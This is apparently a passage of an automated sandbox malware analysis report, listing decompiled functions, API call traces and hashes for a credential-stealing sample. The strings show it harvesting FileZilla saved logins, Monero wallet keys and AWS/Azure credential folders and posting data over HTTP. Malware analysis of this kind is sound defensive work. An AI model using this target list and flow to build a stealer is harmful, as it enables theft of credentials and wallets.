                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00920250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00930DBA,00930DB7,00930DB6,00930DB3), ref: 00920362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00920369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00920385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 009203CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 009203DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00920419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00920463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00920562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00920571
                          • lstrcat.KERNEL32(?,url: ), ref: 00920580
                          • lstrcat.KERNEL32(?,00000000), ref: 00920593
                          • lstrcat.KERNEL32(?,00931678), ref: 009205A2
                          • lstrcat.KERNEL32(?,00000000), ref: 009205B5
                          • lstrcat.KERNEL32(?,0093167C), ref: 009205C4
                          • lstrcat.KERNEL32(?,login: ), ref: 009205D3
                          • lstrcat.KERNEL32(?,00000000), ref: 009205E6
                          • lstrcat.KERNEL32(?,00931688), ref: 009205F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00920604
                          • lstrcat.KERNEL32(?,00000000), ref: 00920617
                          • lstrcat.KERNEL32(?,00931698), ref: 00920626
                          • lstrcat.KERNEL32(?,0093169C), ref: 00920635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: a9c613b3efecb34bdc0cd114016ac1569d4aa1121a3499a79ae87a393c0b0ccb
                          • Instruction ID: 0c0944822851f74238c755931ec97b72f81bed4bc1211dc882d5c337644aed79
                          • Opcode Fuzzy Hash: a9c613b3efecb34bdc0cd114016ac1569d4aa1121a3499a79ae87a393c0b0ccb
                          • Instruction Fuzzy Hash: DDD11072900218ABCB04FBE4ED96FEE7778AF98305F404558F102B7099DF74AA09CB65
                          Function 00915960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                            • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009159F8
                          • StrCmpCA.SHLWAPI(?,01050A00), ref: 00915A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00915B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01050B40,00000000,?,0104B370,00000000,?,00931A1C), ref: 00915E71
                          • lstrlen.KERNEL32(00000000), ref: 00915E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00915E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00915E9A
                          • lstrlen.KERNEL32(00000000), ref: 00915EAF
                          • lstrlen.KERNEL32(00000000), ref: 00915ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00915EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00915F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00915F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00915F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00915FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00915FBD
                          • HttpOpenRequestA.WININET(00000000,010509A0,?,010500C8,00000000,00000000,00400100,00000000), ref: 00915BF8
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • InternetCloseHandle.WININET(00000000), ref: 00915FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: df72a0d672ec4fb11c24d4aa2f2ab45ad9b8f4debb5efd89f929463c97b0e4b8
                          • Instruction ID: 7c103a9de59f5dffe6200b358e309cd08e46704c9557666e29118cd6521a392d
                          • Opcode Fuzzy Hash: df72a0d672ec4fb11c24d4aa2f2ab45ad9b8f4debb5efd89f929463c97b0e4b8
                          • Instruction Fuzzy Hash: FE12EF72921128ABDB15EBA0EC96FEEB378BF94700F504199F10673095EF702A49CF65
                          Function 0091CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0091D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D208
                          • lstrcat.KERNEL32(?,00931478), ref: 0091D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D22A
                          • lstrcat.KERNEL32(?,0093147C), ref: 0091D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D24C
                          • lstrcat.KERNEL32(?,00931480), ref: 0091D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D26E
                          • lstrcat.KERNEL32(?,00931484), ref: 0091D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D290
                          • lstrcat.KERNEL32(?,00931488), ref: 0091D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D2B2
                          • lstrcat.KERNEL32(?,0093148C), ref: 0091D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0091D2D4
                          • lstrcat.KERNEL32(?,00931490), ref: 0091D2E3
                            • Part of subcall function 0092A820: lstrlen.KERNEL32(00914F05,?,?,00914F05,00930DDE), ref: 0092A82B
                            • Part of subcall function 0092A820: lstrcpy.KERNEL32(00930DDE,00000000), ref: 0092A885
                          • lstrlen.KERNEL32(?), ref: 0091D32A
                          • lstrlen.KERNEL32(?), ref: 0091D339
                            • Part of subcall function 0092AA70: StrCmpCA.SHLWAPI(01049ED8,0091A7A7,?,0091A7A7,01049ED8), ref: 0092AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0091D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 345c2ac3fe5a87165e11055102dfd11daa4cc0448efd7ade0fa6db1a1f6372d7
                          • Instruction ID: e625975592d2bb82614feec4c59a5a0d99e1038bb435898609380b20066e7982
                          • Opcode Fuzzy Hash: 345c2ac3fe5a87165e11055102dfd11daa4cc0448efd7ade0fa6db1a1f6372d7
                          • Instruction Fuzzy Hash: B2E1FD72910218ABCB04FBA0ED96FEE7379BF94301F104158F106B70A5DE35AE49CB66
                          Function 0091C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0104F3D0,00000000,?,0093144C,00000000,?,?), ref: 0091CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0091CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0091CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0091CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0091CAD9
                          • StrStrA.SHLWAPI(?,0104F550,00930B52), ref: 0091CAF7
                          • StrStrA.SHLWAPI(00000000,0104F4F0), ref: 0091CB1E
                          • StrStrA.SHLWAPI(?,0104F6C0,00000000,?,00931458,00000000,?,00000000,00000000,?,01049FA8,00000000,?,00931454,00000000,?), ref: 0091CCA2
                          • StrStrA.SHLWAPI(00000000,0104F6E0), ref: 0091CCB9
                            • Part of subcall function 0091C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091C871
                            • Part of subcall function 0091C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091C87C
                          • StrStrA.SHLWAPI(?,0104F6E0,00000000,?,0093145C,00000000,?,00000000,01049FC8), ref: 0091CD5A
                          • StrStrA.SHLWAPI(00000000,01049DA8), ref: 0091CD71
                            • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B46), ref: 0091C943
                            • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B47), ref: 0091C957
                            • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B4E), ref: 0091C978
                          • lstrlen.KERNEL32(00000000), ref: 0091CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0091CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 5e63aafec3fe86ed573c21468683122e30289788821b2c8c776773caed9aa319
                          • Instruction ID: e71bac032e6be8df0cd34362cd23ec7c5af53517edf72c21e8db31480f484583
                          • Opcode Fuzzy Hash: 5e63aafec3fe86ed573c21468683122e30289788821b2c8c776773caed9aa319
                          • Instruction Fuzzy Hash: D4E1F072D10118ABDB14EBA4EC96FEEB778AF98300F404159F10677196EF306A4ACF65
                          Function 00928320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • RegOpenKeyExA.ADVAPI32(00000000,0104C288,00000000,00020019,00000000,009305B6), ref: 009283A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00928426
                          • wsprintfA.USER32 ref: 00928459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0092847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0092848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00928499
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: 0b27d8ea26ce3a47819f88b8f0e2ccb541338862c1ec9d0ac29611fe53709176
                          • Instruction ID: a8df89ca92a4e5d2c8b96ac70b5115b0c6ed458a73fdc51eb5f1e5ba233a293c
                          • Opcode Fuzzy Hash: 0b27d8ea26ce3a47819f88b8f0e2ccb541338862c1ec9d0ac29611fe53709176
                          • Instruction Fuzzy Hash: F6812B72911228ABDB24DB50DC91FEAB7B8BF48700F0086D8E109A7184DF756F85CFA5
                          Function 00924D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00924DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00924DCD
                            • Part of subcall function 00924910: wsprintfA.USER32 ref: 0092492C
                            • Part of subcall function 00924910: FindFirstFileA.KERNEL32(?,?), ref: 00924943
                          • lstrcat.KERNEL32(?,00000000), ref: 00924E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00924E59
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                            • Part of subcall function 00924910: FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                            • Part of subcall function 00924910: FindClose.KERNEL32(000000FF), ref: 00924B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00924EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00924EE5
                            • Part of subcall function 00924910: wsprintfA.USER32 ref: 009249B0
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,009308D2), ref: 009249C5
                            • Part of subcall function 00924910: wsprintfA.USER32 ref: 009249E2
                            • Part of subcall function 00924910: PathMatchSpecA.SHLWAPI(?,?), ref: 00924A1E
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,01050A30), ref: 00924A4A
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,00930FF8), ref: 00924A5C
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,?), ref: 00924A70
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,00930FFC), ref: 00924A82
                            • Part of subcall function 00924910: lstrcat.KERNEL32(?,?), ref: 00924A96
                            • Part of subcall function 00924910: CopyFileA.KERNEL32(?,?,00000001), ref: 00924AAC
                            • Part of subcall function 00924910: DeleteFileA.KERNEL32(?), ref: 00924B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
